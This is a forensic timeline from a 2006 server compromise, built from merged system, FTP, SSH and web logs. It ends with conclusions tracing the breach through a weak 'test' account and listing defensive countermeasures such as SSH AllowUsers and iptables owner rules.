"82.79.137.6" 2006/03/09 15:01:37 82.79.137.27 Mar 9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27 2006/03/09 15:01:39 82.79.137.27 vsftpd: Thu Mar 9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client "82.79.137.27" 2006/03/09 15:01:45 82.79.137.18 * vsftpd: Thu Mar 9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client "82.79.137.18" 2006/03/09 15:01:47 82.79.137.9 * vsftpd: Thu Mar 9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client "82.79.137.9" 2006/03/09 15:02:07 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:08 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:35 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:36 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" ratibus pts/2 82.233.38.20 Thu Mar 16 23:13 - 23:14 (00:00) 2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2 2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:12 193.230.222.209 * test pts/2 193.230.222.209 Fri Mar 17 00:12 - 00:30 (00:18) 2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test 2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed 2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2 2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:15 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 00:15 - 00:15 (00:00) 2006/03/17 00:15:52 193.230.222.209 * Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test 2006/03/17 00:17:28 193.230.222.209 *. Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj 2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure 2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj 2006/03/17 00:17:36 193.230.222.209 *. Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj 2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure 2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj 2006/03/17 00:18:42 193.230.222.209 .* Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants 2006/03/17 00:18:45 193.230.222.209 .* Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net 2006/03/17 00:18:51 193.230.222.209 .* Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net 2006/03/17 00:18:59 193.230.222.209 .* Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net 2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net 2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2 2006/03/17 00:19:50 193.230.222.209 *. Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure 2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours 2006/03/17 00:19:57 193.230.222.209 *. Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure 2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours 2006/03/17 00:20:04 193.230.222.209 *. Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure 2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours 2006/03/17 00:26:26 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:26:27 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:26:28 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2 2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:28 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 00:28 - 00:30 (00:01) 2006/03/17 00:28:40 193.230.222.209 *! Mar 17 06 00:28:40 0 ..c crw--w---- test tty /dev/pts/5 2006/03/17 00:29:02 193.230.222.209 *! Mar 17 06 00:29:02 0 .a. crw--w---- test tty /dev/pts/5 2006/03/17 00:30:31 193.230.222.209 * Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test 2006/03/17 00:30:33 193.230.222.209 * Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test Mar 17 06 06:35:02 0 m.c prw-r----- root adm /dev/xconsole 2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2 2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 09:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 09:00 - 09:38 (00:37) 2006/03/17 09:03:43 193.230.222.209 *! Mar 17 06 09:03:43 0 ..c crw--w---- test tty /dev/pts/6 2006/03/17 09:03:58 193.230.222.209 *! Mar 17 06 09:03:58 0 .a. crw--w---- test tty /dev/pts/6 2006/03/17 09:38:33 193.230.222.209 * Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test 2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2 2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:19 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 12:19 - 14:25 (02:05) 2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2 2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:26 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 12:26 - 14:30 (02:04) 2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2 2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:32 193.230.222.209 * test pts/7 193.230.222.209 Fri Mar 17 12:32 - 16:26 (03:53) 2006/03/17 14:25:38 193.230.222.209 * Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test 2006/03/17 14:30:58 193.230.222.209 * Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test 2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2 2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 14:36 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 14:36 - 16:49 (02:12) 2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2 2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 15:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 15:00 - 17:12 (02:12) 2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2 2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 15:03 193.230.222.209 * test pts/8 193.230.222.209 Fri Mar 17 15:03 - 15:14 (00:10) 2006/03/17 15:14:06 193.230.222.209 * Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test 2006/03/17 16:26:40 193.230.222.209 * Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test 2006/03/17 16:49:15 193.230.222.209 * Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test 2006/03/17 17:12:46 193.230.222.209 * Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test 2006/03/17 17:18 # ## First mails blocked... no contact outside is possible via the default IP source Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2 skycode pts/3 213.49.238.76 Fri Mar 17 19:30 still logged in Mar 17 06 19:30:39 0 ..c crw--w---- skycode tty /dev/pts/3 Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2 skycode pts/4 213.49.238.76 Fri Mar 17 19:33 still logged in Mar 17 06 19:33:45 0 ..c crw--w---- skycode tty /dev/pts/4 Mar 17 19:34:41 localhost sudo: skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash 2006/03/17 19:37:19 ! Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test Mar 17 06 19:38:16 0 ..c crw--w---- root tty /dev/pts/7 2006/03/17 19:39:21 !! Mar 17 06 19:39:21 2467 m.c -rw-r----- root shadow /etc/shadow = test:$ passwd? 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed 2006/03/17 19:40:12 ! Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test 2006/03/17 19:40:19 ! Mar 17 06 19:40:19 4096 m.. drwxr-xr-x test test /home/test 2006/03/17 19:40:19 ! 4096 m.. drwx------ test test /home/test/.mc/cedit = test:$ mc? 2006/03/17 19:40:25 ! Mar 17 06 19:40:25 0 m.. -rw-r--r-- test test /home/test/.mc/history but test not loggued normally 2006/03/17 19:40:25 ! 35 m.. -rw-r--r-- test test /home/test/.mc/Tree or via ./go?? 2006/03/17 19:40:25 ! 4096 m.. drwxr-xr-x test test /home/test/.mc 2006/03/17 19:40:25 ! 32 m.. -rw-r--r-- test test /home/test/.mc/filepos => /tmp/crontab.Hq7als/crontab 1;0 => correspond to crontab -e in .bash_history?... 2006/03/17 19:40:25 ! 1945 m.. -rw-r--r-- test test /home/test/.mc/ini 2006/03/17 19:40:31 ! Mar 17 06 19:40:31 2117 m.. -rw------- test test /home/test/.bash_history phil pts/8 85.234.194.12 Fri Mar 17 20:08 - 20:19 (00:11) phil pts/8 85.234.194.12 Fri Mar 17 20:20 still logged in phil pts/14 85.234.194.12 Fri Mar 17 21:14 still logged in skycode pts/15 213.49.238.76 Fri Mar 17 21:39 still logged in Mar 17 06 21:05:08 0 m.. crw--w---- root tty /dev/pts/12 0 m.. crw------- phil tty /dev/pts/8 Mar 17 06 21:05:09 0 m.. crw--w---- test tty /dev/pts/5 Mar 17 06 21:05:10 0 ma. crw-rw-rw- root tty /dev/ptmx 0 m.. crw--w---- test tty /dev/pts/6 0 .a. crw------- phil tty /dev/pts/8 0 .a. crw-rw-rw- root tty /dev/tty 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1 2006/03/17 21:28:56 # Mar 17 21:28:56 localhost -- MARK -- 2006/03/17 21:30:03 # last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0 2006/03/17 21:30:03 # last occurence of 20060317 213003 probe ended 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost last message repeated 3 times 2006/03/17 21:48:56 # ## No MARK at 21:48:56 2006/03/17 21:50:05 # Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:55 # ## No snmp at 21:55 TODO: ===== ftp repository of test?? /var/cache/tct
Conclusions
- Initial breach
- automatic tool scanning ftp accounts could enter with the 'test' account
- manual attempt to log in with the 'test' account
- download over of sniffers and brute-force tools for ssh
- transfers over ftp
- change test password
- 82.79.137.NN = NN.metronetwork.rdsbz.ro
- 193.230.222.209 = 209-nat.s-man.net
- Counter-measures
- don't use dummy passwords ;-)
- don't grant ftp/ssh rights per default
sshd: make use of the "AllowUsers" keyword and explicitely add users when needed - don't grant internet access per default
iptables: cf --uid-owner and other --XXX-owner options
on OUTPUT table to avoid download of malicious code
on INPUT table to avoid bindshells
- Timeline
- Before and during the live forensic analysis we should have written down our own actions and the observable elements rather that having to deduce them from the logs.